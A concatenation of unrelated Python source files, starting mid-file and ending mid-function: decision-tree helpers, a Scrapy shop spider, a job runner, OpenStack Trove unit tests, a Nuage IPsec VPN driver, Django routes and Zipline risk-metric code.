    http_method_names = ['post', 'head', 'options', 'trace']

    def get_queryset(self):
        """
        Filter providers by current user
        """
        user = self.request.user
        if (type(user) == AnonymousUser):
            return Identity.objects.none()

        identities = user.current_identities()
        return identities

# Copyright 2017 Priscilla Boyd. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================

"""
    The DT_Utils module provides helper functions for Decision Tree algorithms implementation, model creation and
    analysis.
"""
import pickle
from matplotlib import pyplot as plt
from sklearn.metrics import mean_squared_error
from tools.Utils import create_folder_if_not_exists


# noinspection PyTypeChecker
def score_dt(model_name, model, X, y, y_actual, output_folder):
    """
    Score a decision tree model.

    :param string model_name: title for the model used on the output filename
    :param dataframe model: model reference
    :param dataframe X: examples
    :param dataframe y: targets
    :param dataframe y_actual: target results
    :param string output_folder: location of the output / results
    """
    print("Scoring model...")
    model_score = model.score(X, y)
    mse = mean_squared_error(y, y_actual)

    mse_score = model_name, "- Mean Squared Error:", mse
    accuracy = model_name, "- Accuracy score (%):", "{:.2%}".format(model_score)

    # write to file
    path = output_folder + '/models'
    create_folder_if_not_exists(path)

    filename = path + '/score_' + model_name + '.txt'
    with open(filename, 'w') as scores:
        print(mse_score, file=scores)
        print(accuracy, file=scores)
    scores.close()
    print("Scores saved location:", filename)


def plot_dt(model_name, y_actual, y_test, output_folder):
    """
    Plot decision tree, y (training) vs y (test/actual).

    :param string model_name: title for the model used on the output filename
    :param dataframe y_actual: target results
    :param dataframe y_test: test targets
    :param string output_folder: location of the output / results
    """

    # initialise plot path
    path = output_folder + '/models'

    print("Plotting results...")
    plt.scatter(y_actual, y_test, label='Duration')
    plt.title('Decision Tree')
    plt.plot([0, 1], [0, 1], '--k', transform=plt.gca().transAxes)
    plt.xlabel('y (actual)')
    plt.ylabel('y (test)')
    plt.legend()
    plot_path = path + '/plot_' + model_name + '.png'
    plt.savefig(plot_path)
    print("Plot saved location:", plot_path)


def save_dt_model(model_name, model, folder):
    """
    Save model using Pickle binary format.

    :param dataframe model: model reference
    :param string model_name: title for the model used on the output filename
    :param string folder: location of model output
    """
    print("Saving model...")
    model_file = folder + '/models/' + model_name + '.pkl'
    path = open(model_file, 'wb')
    pickle.dump(model, path)
    print("Model saved location:", model_file)


def load_dt_model(pickle_model):
    """
    Retrieve model using Pickle binary format.

    :param string pickle_model: location of Pickle model
    :return: Pickle model for re-use
    :rtype: object
    """
    return pickle.loads(pickle_model)

from artnet import *
import SocketServer
import time, os, random, datetime, sys
import argparse
import socket
import struct
from subprocess import Popen, PIPE, STDOUT
import glob

DEBUG = False
 
UDP_IP = "2.0.0.61"
UDP_PORT = 6454



import sys
from drone.actions.emr_launcher import launch_emr_task
from drone.actions.ssh_launcher import launch_ssh_task
from drone.job_runner.dependency_manager import dependencies_are_met
from drone.job_runner.job_progress_checker import check_running_job_progress
from drone.metadata.metadata import get_job_info, job_status, set_ready, set_running, set_failed

task_launcher = {'ssh': launch_ssh_task,
                 'emr': launch_emr_task}


def process(job_config, settings):
    for job_id, schedule_time, execution_time, status, runs, uid in get_job_info(job_config.get('id'),
                                                                                 db_name=settings.metadata):

        if status == job_status.get('failed'):
            if (int(job_config.get('retry')) if job_config.get('retry') else 0) > int(runs):
                settings.logger.debug(
                    '%s runs %s. set retries %s.' % (job_config.get('id'), runs, job_config.get('retry')))
                if dependencies_are_met(job_config, schedule_time, settings):
                    set_ready(job_config.get('id'), schedule_time, db_name=settings.metadata)
                    settings.logger.info('Job "%s" "%s" set as ready' % (job_config.get('id'), schedule_time))
                    run(job_config, schedule_time, settings)
                    continue
                else:
                    continue
            else:
                continue
        elif status == job_status.get('running'):
            check_running_job_progress(job_config, schedule_time, uid, settings)
            continue
        elif status == job_status.get('ready'):
            run(job_config, schedule_time, settings)
        elif status == job_status.get('succeeded'):
            continue
        elif status == job_status.get('not_ready'):
            if dependencies_are_met(job_config, schedule_time, settings):
                set_ready(job_config.get('id'), schedule_time, db_name=settings.metadata)
                settings.logger.info('Job "%s" "%s" set as ready' % (job_config.get('id'), schedule_time))
                run(job_config, schedule_time, settings)
            else:
                continue
        else:
            settings.logger.error('Unknown job status "%s"' % status)
            sys.exit(1)


def run(job_config, schedule_time, settings):
    settings.logger.info('Starting job "%s" "%s"' % (job_config.get('id'), schedule_time))
    job_type = job_config.get('type')
    try:
        assert job_type in settings.supported_job_types
    except:
        settings.logger.warning(
            'Unsupported job type %s. Valid types are %s' % (job_type, str(settings.supported_job_types)))

    task_lauched_successfully, uid = task_launcher.get(job_type)(job_config, schedule_time, settings)

    if task_lauched_successfully:
        set_running(job_config.get('id'), schedule_time, uid, db_name=settings.metadata)
        settings.logger.info('Started job "%s" "%s"' % (job_config.get('id'), schedule_time))
    else:
        set_failed(job_config.get('id'), schedule_time, db_name=settings.metadata)
        settings.logger.warning('Failed to start job "%s" "%s"' % (job_config.get('id'), schedule_time))

import scrapy
from scrapy import log
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from rcbi.items import Part

import copy
import json
import re

VARIANT_JSON_REGEX = re.compile("product: ({.*}),")

class ShendronesSpider(CrawlSpider):
  name = "shendrones"
  allowed_domains = ["shendrones.myshopify.com"]
  start_urls = ["http://shendrones.myshopify.com/collections/all"]

  rules = (
    Rule(LinkExtractor(restrict_css=[".grid-item"]), callback='parse_item'),
  )

  def parse_item(self, response):
    item = Part()
    item["site"] = self.name

    variant = {}
    item["variants"] = [variant]
    base_url = response.url

    item["manufacturer"] = "Shendrones"

    # Find the json info for variants.
    body = response.body_as_unicode()

    m = VARIANT_JSON_REGEX.search(body)
    if m:
      shopify_info = json.loads(m.group(1))
      global_title = shopify_info["title"]
      preorder = False
      if global_title.endswith("Pre Order"):
        global_title = global_title[:-len("Pre Order")].strip()
        variant["stock_state"] = "backordered"
        preorder = True
      for v in shopify_info["variants"]:
        if v["title"] != "Default Title":
          item["name"] = global_title + " " + v["title"]
          variant["url"] = base_url + "?variant=" + str(v["id"])
        else:
          item["name"] = global_title
          variant["url"] = base_url
        variant["price"] = "${:.2f}".format(v["price"] / 100)
        if not preorder:
          if v["inventory_quantity"] <= 0:
            if v["inventory_policy"] == "deny":
              variant["stock_state"] = "out_of_stock"
            else:
              variant["stock_state"] = "backordered"
          elif v["inventory_quantity"] < 3:
            variant["stock_state"] = "low_stock"
            variant["stock_text"] = "Only " + str(v["inventory_quantity"]) + " left!"
          else:
            variant["stock_state"] = "in_stock"

        yield item
        item = copy.deepcopy(item)
        variant = item["variants"][0]

from karld.loadump import dump_dicts_to_json_file

from karld.loadump import ensure_dir
from karld.loadump import ensure_file_path_dir

from karld.loadump import i_get_csv_data
from karld.loadump import is_file_csv

from karld.loadump import i_get_json_data
from karld.loadump import is_file_json

from karld.loadump import raw_line_reader

from karld.loadump import split_csv_file
from karld.loadump import split_file

from karld.loadump import split_file_output
from karld.loadump import split_file_output_csv
from karld.loadump import split_file_output_json

from karld.loadump import write_as_csv
from karld.loadump import write_as_json

#    Copyright 2014 Rackspace Hosting
#    Copyright 2014 Hewlett-Packard Development Company, L.P.
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.
import uuid

from mock import Mock, patch

from trove.backup import models as backup_models
from trove.common import cfg
from trove.common import exception
from trove.common.instance import ServiceStatuses
from trove.datastore import models as datastore_models
from trove.instance import models
from trove.instance.models import DBInstance
from trove.instance.models import filter_ips
from trove.instance.models import Instance
from trove.instance.models import InstanceServiceStatus
from trove.instance.models import SimpleInstance
from trove.instance.tasks import InstanceTasks
from trove.taskmanager import api as task_api
from trove.tests.fakes import nova
from trove.tests.unittests import trove_testtools
from trove.tests.unittests.util import util

CONF = cfg.CONF


class SimpleInstanceTest(trove_testtools.TestCase):

    def setUp(self):
        super(SimpleInstanceTest, self).setUp()
        db_info = DBInstance(
            InstanceTasks.BUILDING, name="TestInstance")
        self.instance = SimpleInstance(
            None, db_info, InstanceServiceStatus(
                ServiceStatuses.BUILDING), ds_version=Mock(), ds=Mock())
        db_info.addresses = {"private": [{"addr": "123.123.123.123"}],
                             "internal": [{"addr": "10.123.123.123"}],
                             "public": [{"addr": "15.123.123.123"}]}
        self.orig_conf = CONF.network_label_regex
        self.orig_ip_regex = CONF.ip_regex
        self.orig_black_list_regex = CONF.black_list_regex

    def tearDown(self):
        super(SimpleInstanceTest, self).tearDown()
        CONF.network_label_regex = self.orig_conf
        CONF.ip_start = None

    def test_get_root_on_create(self):
        root_on_create_val = Instance.get_root_on_create(
            'redis')
        self.assertFalse(root_on_create_val)

    def test_filter_ips_white_list(self):
        CONF.network_label_regex = '.*'
        CONF.ip_regex = '^(15.|123.)'
        CONF.black_list_regex = '^10.123.123.*'
        ip = self.instance.get_visible_ip_addresses()
        ip = filter_ips(
            ip, CONF.ip_regex, CONF.black_list_regex)
        self.assertEqual(2, len(ip))
        self.assertTrue('123.123.123.123' in ip)
        self.assertTrue('15.123.123.123' in ip)

    def test_filter_ips_black_list(self):
        CONF.network_label_regex = '.*'
        CONF.ip_regex = '.*'
        CONF.black_list_regex = '^10.123.123.*'
        ip = self.instance.get_visible_ip_addresses()
        ip = filter_ips(
            ip, CONF.ip_regex, CONF.black_list_regex)
        self.assertEqual(2, len(ip))
        self.assertTrue('10.123.123.123' not in ip)

    def test_one_network_label(self):
        CONF.network_label_regex = 'public'
        ip = self.instance.get_visible_ip_addresses()
        self.assertEqual(['15.123.123.123'], ip)

    def test_two_network_labels(self):
        CONF.network_label_regex = '^(private|public)$'
        ip = self.instance.get_visible_ip_addresses()
        self.assertEqual(2, len(ip))
        self.assertTrue('123.123.123.123' in ip)
        self.assertTrue('15.123.123.123' in ip)

    def test_all_network_labels(self):
        CONF.network_label_regex = '.*'
        ip = self.instance.get_visible_ip_addresses()
        self.assertEqual(3, len(ip))
        self.assertTrue('10.123.123.123' in ip)
        self.assertTrue('123.123.123.123' in ip)
        self.assertTrue('15.123.123.123' in ip)


class CreateInstanceTest(trove_testtools.TestCase):

    @patch.object(task_api.API, 'get_client', Mock(return_value=Mock()))
    def setUp(self):
        util.init_db()
        self.context = trove_testtools.TroveTestContext(self, is_admin=True)
        self.name = "name"
        self.flavor_id = 5
        self.image_id = "UUID"
        self.databases = []
        self.users = []
        self.datastore = datastore_models.DBDatastore.create(
            id=str(uuid.uuid4()),
            name='mysql' + str(uuid.uuid4()),
        )
        self.datastore_version = (
            datastore_models.DBDatastoreVersion.create(
                id=str(uuid.uuid4()),
                datastore_id=self.datastore.id,
                name="5.5" + str(uuid.uuid4()),
                manager="mysql",
                image_id="image_id",
                packages="",
                active=True))
        self.volume_size = 1
        self.az = "az"
        self.nics = None
        self.configuration = None
        self.tenant_id = "UUID"
        self.datastore_version_id = str(uuid.uuid4())

        self.db_info = DBInstance.create(
            name=self.name, flavor_id=self.flavor_id,
            tenant_id=self.tenant_id,
            volume_size=self.volume_size,
            datastore_version_id=self.datastore_version.id,
            task_status=InstanceTasks.BUILDING,
            configuration_id=self.configuration
        )

        self.backup_name = "name"
        self.descr = None
        self.backup_state = backup_models.BackupState.COMPLETED
        self.instance_id = self.db_info.id
        self.parent_id = None
        self.deleted = False

        self.backup = backup_models.DBBackup.create(
            name=self.backup_name,
            description=self.descr,
            tenant_id=self.tenant_id,
            state=self.backup_state,
            instance_id=self.instance_id,
            parent_id=self.parent_id,
            datastore_version_id=self.datastore_version.id,
            deleted=False
        )
        self.backup.size = 1.1
        self.backup.save()
        self.backup_id = self.backup.id
        self.orig_client = models.create_nova_client
        models.create_nova_client = nova.fake_create_nova_client
        self.orig_api = task_api.API(self.context).create_instance
        task_api.API(self.context).create_instance = Mock()
        self.run_with_quotas = models.run_with_quotas
        models.run_with_quotas = Mock()
        self.check = backup_models.DBBackup.check_swift_object_exist
        backup_models.DBBackup.check_swift_object_exist = Mock(
            return_value=True)
        super(CreateInstanceTest, self).setUp()

    @patch.object(task_api.API, 'get_client', Mock(return_value=Mock()))
    def tearDown(self):
        self.db_info.delete()
        self.backup.delete()
        self.datastore.delete()
        self.datastore_version.delete()
        models.create_nova_client = self.orig_client
        task_api.API(self.context).create_instance = self.orig_api
        models.run_with_quotas = self.run_with_quotas
        backup_models.DBBackup.check_swift_object_exist = self.check
        self.backup.delete()
        self.db_info.delete()
        super(CreateInstanceTest, self).tearDown()

    def test_exception_on_invalid_backup_size(self):
        self.assertEqual(self.backup.id, self.backup_id)
        exc = self.assertRaises(
            exception.BackupTooLarge, models.Instance.create,
            self.context, self.name, self.flavor_id,
            self.image_id, self.databases, self.users,
            self.datastore, self.datastore_version,
            self.volume_size, self.backup_id,
            self.az, self.nics, self.configuration
        )
        self.assertIn("Backup is too large for "
                      "given flavor or volume.", str(exc))

    def test_can_restore_from_backup_with_almost_equal_size(self):
        # target size equals to "1Gb"
        self.backup.size = 0.99
        self.backup.save()
        instance = models.Instance.create(
            self.context, self.name, self.flavor_id,
            self.image_id, self.databases, self.users,
            self.datastore, self.datastore_version,
            self.volume_size, self.backup_id,
            self.az, self.nics, self.configuration)
        self.assertIsNotNone(instance)


class TestReplication(trove_testtools.TestCase):

    def setUp(self):
        util.init_db()

        self.datastore = datastore_models.DBDatastore.create(
            id=str(uuid.uuid4()),
            name='name' + str(uuid.uuid4()),
            default_version_id=str(uuid.uuid4()))

        self.datastore_version = datastore_models.DBDatastoreVersion.create(
            id=self.datastore.default_version_id,
            name='name' + str(uuid.uuid4()),
            image_id=str(uuid.uuid4()),
            packages=str(uuid.uuid4()),
            datastore_id=self.datastore.id,
            manager='mysql',
            active=1)

        self.master = DBInstance(
            InstanceTasks.NONE,
            id=str(uuid.uuid4()),
            name="TestMasterInstance",
            datastore_version_id=self.datastore_version.id)
        self.master.set_task_status(InstanceTasks.NONE)
        self.master.save()
        self.master_status = InstanceServiceStatus(
            ServiceStatuses.RUNNING,
            id=str(uuid.uuid4()),
            instance_id=self.master.id)
        self.master_status.save()

        self.safe_nova_client = models.create_nova_client
        models.create_nova_client = nova.fake_create_nova_client
        super(TestReplication, self).setUp()

    def tearDown(self):
        self.master.delete()
        self.master_status.delete()
        self.datastore.delete()
        self.datastore_version.delete()
        models.create_nova_client = self.safe_nova_client
        super(TestReplication, self).tearDown()

    @patch('trove.instance.models.LOG')
    def test_replica_of_not_active_master(self, mock_logging):
        self.master.set_task_status(InstanceTasks.BUILDING)
        self.master.save()
        self.master_status.set_status(ServiceStatuses.BUILDING)
        self.master_status.save()
        self.assertRaises(exception.UnprocessableEntity,
                          Instance.create,
                          None, 'name', 1, "UUID", [], [], None,
                          self.datastore_version, 1,
                          None, slave_of_id=self.master.id)

    @patch('trove.instance.models.LOG')
    def test_replica_with_invalid_slave_of_id(self, mock_logging):
        self.assertRaises(exception.NotFound,
                          Instance.create,
                          None, 'name', 1, "UUID", [], [], None,
                          self.datastore_version, 1,
                          None, slave_of_id=str(uuid.uuid4()))

    def test_create_replica_from_replica(self):
        self.replica_datastore_version = Mock(
            spec=datastore_models.DBDatastoreVersion)
        self.replica_datastore_version.id = "UUID"
        self.replica_datastore_version.manager = 'mysql'
        self.replica_info = DBInstance(
            InstanceTasks.NONE,
            id="UUID",
            name="TestInstance",
            datastore_version_id=self.replica_datastore_version.id,
            slave_of_id=self.master.id)
        self.replica_info.save()
        self.assertRaises(exception.Forbidden, Instance.create,
                          None, 'name', 2, "UUID", [], [], None,
                          self.datastore_version, 1,
                          None, slave_of_id=self.replica_info.id)

# Copyright 2016 Nuage Netowrks USA Inc.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import abc
import copy
import os
import oslo_messaging
import six

from neutron.agent.linux import ip_lib
from neutron.common import rpc as n_rpc
from neutron import context
from neutron_lib import constants
from neutron_lib.plugins import directory
from neutron_vpnaas.services.vpn import device_drivers
from neutron_vpnaas.services.vpn.device_drivers import fedora_strongswan_ipsec
from neutron_vpnaas.services.vpn.device_drivers import ipsec
from neutron_vpnaas.services.vpn.device_drivers import strongswan_ipsec
from nuage_neutron.vpnaas.common import topics
from nuage_neutron.vpnaas.nuage_interface import NuageInterfaceDriver
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall


LOG = logging.getLogger(__name__)
TEMPLATE_PATH = os.path.dirname(os.path.abspath(__file__))
IPSEC_CONNS = 'ipsec_site_connections'


class NuageIPsecVpnDriverApi(object):
    """IPSecVpnDriver RPC api."""

    def __init__(self, topic):
        target = oslo_messaging.Target(topic=topic, version='1.0')
        self.client = n_rpc.get_client(target)

    def get_vpn_services_on_host(self, context, host):
        """Get list of vpnservices.

            The vpnservices including related ipsec_site_connection,
            ikepolicy and ipsecpolicy on this host
        """
        cctxt = self.client.prepare()
        return cctxt.call(context, 'get_vpn_services_on_host', host=host)

    def update_status(self, context, status):
        """Update local status.

            This method call updates status attribute of
            VPNServices.
        """
        cctxt = self.client.prepare()
        return cctxt.call(context, 'update_status', status=status)


@six.add_metaclass(abc.ABCMeta)
class NuageIPsecDriver(device_drivers.DeviceDriver):

    def __init__(self, vpn_service, host):
        self.conf = vpn_service.conf
        self.host = host
        self.conn = n_rpc.create_connection(new=True)
        self.context = context.get_admin_context_without_session()
        self.topic = topics.NUAGE_IPSEC_AGENT_TOPIC
        self.processes = {}
        self.routers = {}
        self.process_status_cache = {}
        self.endpoints = [self]
        self.conn.create_consumer(self.topic, self.endpoints)
        self.conn.consume_in_threads()
        self.agent_rpc = NuageIPsecVpnDriverApi(
            topics.NUAGE_IPSEC_DRIVER_TOPIC)
        self.process_status_cache_check = loopingcall.FixedIntervalLoopingCall(
            self.report_status, self.context)
        self.process_status_cache_check.start(
            interval=20)
        self.nuage_if_driver = NuageInterfaceDriver(cfg.CONF)

    def _get_l3_plugin(self):
        return directory.get_plugin(constants.L3)

    def get_namespace(self, router_id):
        """Get namespace of router.

        :router_id: router_id
        :returns: namespace string.
        """
        return 'vpn-' + router_id

    def vpnservice_updated(self, context, **kwargs):
        """Vpnservice updated rpc handler

        VPN Service Driver will call this method
        when vpnservices updated.
        Then this method start sync with server.
        """
        router = kwargs.get('router', None)
        self.sync(context, [router] if router else [])

    def tracking(self, context, **kwargs):
        """Handling create router event.

        Agent calls this method, when the process namespace is ready.
        Note: process_id == router_id == vpnservice_id
        """
        router = kwargs.get('router', None)
        process_id = router['id']
        self.routers[process_id] = process_id
        if process_id in self.processes:
            # In case of vpnservice is created
            # before vpn service namespace
            process = self.processes[process_id]
            process.enable()

    def non_tracking(self, context, **kwargs):
        router = kwargs.get('router', None)
        process_id = router['id']
        self.destroy_process(process_id)
        if process_id in self.routers:
            del self.routers[process_id]

    def ensure_process(self, process_id, vpnservice=None):
        """Ensuring process.

        If the process doesn't exist, it will create process
        and store it in self.processs
        """
        process = self.processes.get(process_id)
        if not process or not process.namespace:
            namespace = self.get_namespace(process_id)
            process = self.create_process(
                process_id,
                vpnservice,
                namespace)
            self.processes[process_id] = process
        elif vpnservice:
            process.update_vpnservice(vpnservice)
        return process

    @lockutils.synchronized('vpn-agent', 'neutron-')
    def sync(self, context, routers):
        """Sync status with server side.

        :param context: context object for RPC call
        :param routers: Router objects which is created in this sync event

        There could be many failure cases should be
        considered including the followings.
        1) Agent class restarted
        2) Failure on process creation
        3) VpnService is deleted during agent down
        4) RPC failure

        In order to handle, these failure cases,
        the driver needs to take sync strategies.

        """
        vpnservices = self.agent_rpc.get_vpn_services_on_host(
            context, self.host)
        router_ids = [vpnservice['router_id'] for vpnservice in vpnservices]
        sync_router_ids = [router['id'] for router in routers]
        self._sync_vpn_processes(vpnservices, sync_router_ids)
        self._delete_vpn_processes(sync_router_ids, router_ids)
        self._cleanup_stale_vpn_processes(router_ids)
        self.report_status(context)

    def get_process_status_cache(self, process):
        if not self.process_status_cache.get(process.id):
            self.process_status_cache[process.id] = {
                'status': None,
                'id': process.vpnservice['id'],
                'updated_pending_status': False,
                'ipsec_site_connections': {}}
        return self.process_status_cache[process.id]

    def report_status(self, context):
        status_changed_vpn_services = []
        for process in self.processes.values():
            previous_status = self.get_process_status_cache(process)
            if self.is_status_updated(process, previous_status):
                new_status = self.copy_process_status(process)
                self.update_downed_connections(process.id, new_status)
                status_changed_vpn_services.append(new_status)
                self.process_status_cache[process.id] = (
                    self.copy_process_status(process))
                # We need unset updated_pending status after it
                # is reported to the server side
                self.unset_updated_pending_status(process)

        if status_changed_vpn_services:
            self.agent_rpc.update_status(context,
                                         status_changed_vpn_services)

    def _sync_vpn_processes(self, vpnservices, sync_router_ids):
        for vpnservice in vpnservices:
            if vpnservice['router_id'] not in self.processes or (
                    vpnservice['router_id'] in sync_router_ids):
                process = self.ensure_process(vpnservice['router_id'],
                                              vpnservice=vpnservice)
                router = self.routers.get(vpnservice['router_id'])
                if not router:
                    continue
                process.update()

    def _delete_vpn_processes(self, sync_router_ids, vpn_router_ids):
        for process_id in sync_router_ids:
            if process_id not in vpn_router_ids:
                self.destroy_process(process_id)

    def _cleanup_stale_vpn_processes(self, vpn_router_ids):
        process_ids = [pid for pid in self.processes
                       if pid not in vpn_router_ids]
        for process_id in process_ids:
            self.destroy_process(process_id)

    def is_status_updated(self, process, previous_status):
        if process.updated_pending_status:
            return True
        if process.status != previous_status['status']:
            return True
        if (process.connection_status !=
                previous_status['ipsec_site_connections']):
            return True

    def unset_updated_pending_status(self, process):
        process.updated_pending_status = False
        for connection_status in process.connection_status.values():
            connection_status['updated_pending_status'] = False

    def copy_process_status(self, process):
        return {
            'id': process.vpnservice['id'],
            'status': process.status,
            'updated_pending_status': process.updated_pending_status,
            'ipsec_site_connections': copy.deepcopy(process.connection_status)
        }

    def update_downed_connections(self, process_id, new_status):
        """Update info to be reported, if connections just went down.

            If there is no longer any information for a connection, because it
            has been removed (e.g. due to an admin down of VPN service or IPSec
            connection), but there was previous status information for the
            connection, mark the connection as down for reporting purposes.
        """
        if process_id in self.process_status_cache:
            for conn in self.process_status_cache[process_id][IPSEC_CONNS]:
                if conn not in new_status[IPSEC_CONNS]:
                    new_status[IPSEC_CONNS][conn] = {
                        'status': constants.DOWN,
                        'updated_pending_status': True
                    }

    def create_router(self, router):
        """Handling create router event."""
        pass

    def destroy_router(self, process_id):
        pass

    def destroy_process(self, process_id):
        """Destroy process.

        Disable the process and remove the process
        manager for the processes that no longer are running vpn service.
        """
        if process_id in self.processes:
            process = self.processes[process_id]
            process.disable()
            if process_id in self.processes:
                del self.processes[process_id]

    def plug_to_ovs(self, context, **kwargs):
        self.nuage_if_driver.plug(kwargs['network_id'], kwargs['port_id'],
                                  kwargs['device_name'], kwargs['mac'],
                                  'alubr0', kwargs['ns_name'])

        self.nuage_if_driver.init_l3(kwargs['device_name'], kwargs['cidr'],
                                     kwargs['ns_name'])
        device = ip_lib.IPDevice(kwargs['device_name'],
                                 namespace=kwargs['ns_name'])
        for gateway_ip in kwargs['gw_ip']:
            device.route.add_gateway(gateway_ip)

    def unplug_from_ovs(self, context, **kwargs):
        self.nuage_if_driver.unplug(kwargs['device_name'], 'alubr0',
                                    kwargs['ns_name'])
        ip = ip_lib.IPWrapper(kwargs['ns_name'])
        ip.garbage_collect_namespace()
        # On Redhat deployments an additional directory is created named
        # 'ip_vti0' in the namespace which prevents the cleanup
        # of namespace by the neutron agent in 'ip_lib.py' which we clean.
        if kwargs['ns_name'] in ip.get_namespaces():
            ip.netns.delete(kwargs['ns_name'])


class NuageOpenSwanDriver(NuageIPsecDriver):
    def create_process(self, process_id, vpnservice, namespace):
        return ipsec.OpenSwanProcess(
            self.conf,
            process_id,
            vpnservice,
            namespace)


class NuageStrongSwanDriver(NuageIPsecDriver):
    def create_process(self, process_id, vpnservice, namespace):
        return strongswan_ipsec.StrongSwanProcess(
            self.conf,
            process_id,
            vpnservice,
            namespace)


class NuageStrongSwanDriverFedora(NuageIPsecDriver):
    def create_process(self, process_id, vpnservice, namespace):
        return fedora_strongswan_ipsec.FedoraStrongSwanProcess(
            self.conf,
            process_id,
            vpnservice,
            namespace)

from django.conf.urls import patterns, include, url

from django.contrib import admin
from api import views
admin.autodiscover()
from rest_framework.routers import DefaultRouter

router = DefaultRouter()
router.register(r'headings', views.HeadingViewSet)
router.register(r'users', views.UserViewSet)

urlpatterns = patterns('',
    url(r'^', include(router.urls)),
    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
)
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import functools

import logbook
import math
import numpy as np
import numpy.linalg as la

from six import iteritems

from zipline.finance import trading

import pandas as pd

from . import risk
from . risk import (
    alpha,
    check_entry,
    information_ratio,
    sharpe_ratio,
    sortino_ratio,
)

log = logbook.Logger('Risk Period')

choose_treasury = functools.partial(risk.choose_treasury,
                                    risk.select_treasury_duration)


class RiskMetricsPeriod(object):
    def __init__(self, start_date, end_date, returns,
                 benchmark_returns=None):

        treasury_curves = trading.environment.treasury_curves
        if treasury_curves.index[-1] >= start_date:
            mask = ((treasury_curves.index >= start_date) &
                    (treasury_curves.index <= end_date))

            self.treasury_curves = treasury_curves[mask]
        else:
            # our test is beyond the treasury curve history
            # so we'll use the last available treasury curve
            self.treasury_curves = treasury_curves[-1:]

        self.start_date = start_date
        self.end_date = end_date

        if benchmark_returns is None:
            br = trading.environment.benchmark_returns
            benchmark_returns = br[(br.index >= returns.index[0]) &
                                   (br.index <= returns.index[-1])]

        self.algorithm_returns = self.mask_returns_to_period(returns)
        self.benchmark_returns = self.mask_returns_to_period(benchmark_returns)
        self.calculate_metrics()

    def calculate_metrics(self):

        self.benchmark_period_returns = \
            self.calculate_period_returns(self.benchmark_returns)

        self.algorithm_period_returns = \
            self.calculate_period_returns(self.algorithm_returns)

        if not self.algorithm_returns.index.equals(
            self.benchmark_returns.index
        ):
            message = "Mismatch between benchmark_returns ({bm_count}) and \
            algorithm_returns ({algo_count}) in range {start} : {end}"
            message = message.format(
                bm_count=len(self.benchmark_returns),
                algo_count=len(self.algorithm_returns),
                start=self.start_date,
                end=self.end_date
            )
            raise Exception(message)

        self.num_trading_days = len(self.benchmark_returns)
        self.benchmark_volatility = self.calculate_volatility(
            self.benchmark_returns)
        self.algorithm_volatility = self.calculate_volatility(
            self.algorithm_returns)
        self.treasury_period_return = choose_treasury(
            self.treasury_curves,
            self.start_date,
            self.end_date
        )
        self.sharpe = self.calculate_sharpe()
        self.sortino = self.calculate_sortino()
        self.information = self.calculate_information()
        self.beta, self.algorithm_covariance, self.benchmark_variance, \
            self.condition_number, self.eigen_values = self.calculate_beta()
        self.alpha = self.calculate_alpha()
        self.excess_return = self.algorithm_period_returns - \
            self.treasury_period_return
        self.max_drawdown = self.calculate_max_drawdown()

    def to_dict(self):
        """
        Creates a dictionary representing the state of the risk report.
        Returns a dict object of the form:
        """
        period_label = self.end_date.strftime("%Y-%m")
        rval = {
            'trading_days': self.num_trading_days,
            'benchmark_volatility': self.benchmark_volatility,
            'algo_volatility': self.algorithm_volatility,
            'treasury_period_return': self.treasury_period_return,
            'algorithm_period_return': self.algorithm_period_returns,
            'benchmark_period_return': self.benchmark_period_returns,
            'sharpe': self.sharpe,
            'sortino': self.sortino,
            'information': self.information,
            'beta': self.beta,
            'alpha': self.alpha,
            'excess_return': self.excess_return,
            'max_drawdown': self.max_drawdown,
            'period_label': period_label
        }

        return {k: None if check_entry(k, v) else v
                for k, v in iteritems(rval)}

    def __repr__(self):
        statements = []
        metrics = [
            "algorithm_period_returns",
            "benchmark_period_returns",
            "excess_return",
            "num_trading_days",
            "benchmark_volatility",
            "algorithm_volatility",
            "sharpe",
            "sortino",
            "information",
            "algorithm_covariance",
            "benchmark_variance",
            "beta",
            "alpha",
            "max_drawdown",
            "algorithm_returns",
            "benchmark_returns",
            "condition_number",
            "eigen_values"
        ]

        for metric in metrics:
            value = getattr(self, metric)
            statements.append("{m}:{v}".format(m=metric, v=value))

        return '\n'.join(statements)

    def mask_returns_to_period(self, daily_returns):
        if isinstance(daily_returns, list):
            returns = pd.Series([x.returns for x in daily_returns],
                                index=[x.date for x in daily_returns])
        else:  # otherwise we're receiving an index already
            returns = daily_returns

        trade_days = trading.environment.trading_days
        trade_day_mask = returns.index.normalize().isin(trade_days)

        mask = ((returns.index >= self.start_date) &
                (returns.index <= self.end_date) & trade_day_mask)

        returns = returns[mask]
        return returns

    def calculate_period_returns(self, returns):
        period_returns = (1. + returns).prod() - 1
        return period_returns

    def calculate_volatility(self, daily_returns):
